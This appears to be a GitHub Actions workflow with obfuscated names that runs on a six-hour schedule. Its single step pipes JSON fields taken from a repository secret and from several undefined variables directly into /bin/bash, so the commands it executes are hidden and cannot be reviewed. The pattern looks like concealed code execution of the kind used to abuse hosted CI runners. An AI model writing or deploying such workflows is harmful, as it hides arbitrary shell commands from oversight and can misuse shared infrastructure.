name: yanjingwu1819

on:
  workflow_dispatch:
  schedule:
    - cron: '50 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanjingwu1819
        env:
          n4: ${{ secrets.n4 }}
        run: |
          echo $n4 | jq -r .tpzg44 | /bin/bash
          echo $euzte9 | jq -r .pbtvt71267 | /bin/bash
          echo $zmu37957 | jq -r .rdaoc9464 | /bin/bash
          echo $epkej63409 | jq -r .ax63111 | /bin/bash
          echo $zqf5018 | jq -r .fwqx024 | /bin/bash
          echo $r19624 | jq -r .awo92678 | /bin/bash
          echo $zvg69 | jq -r .cuirt3 | /bin/bash
          echo $ituj2210 | jq -r .w6396 | /bin/bash
          echo $p21086 | jq -r .vu732 | /bin/bash
          echo $gcka060 | jq -r .zw5 | /bin/bash

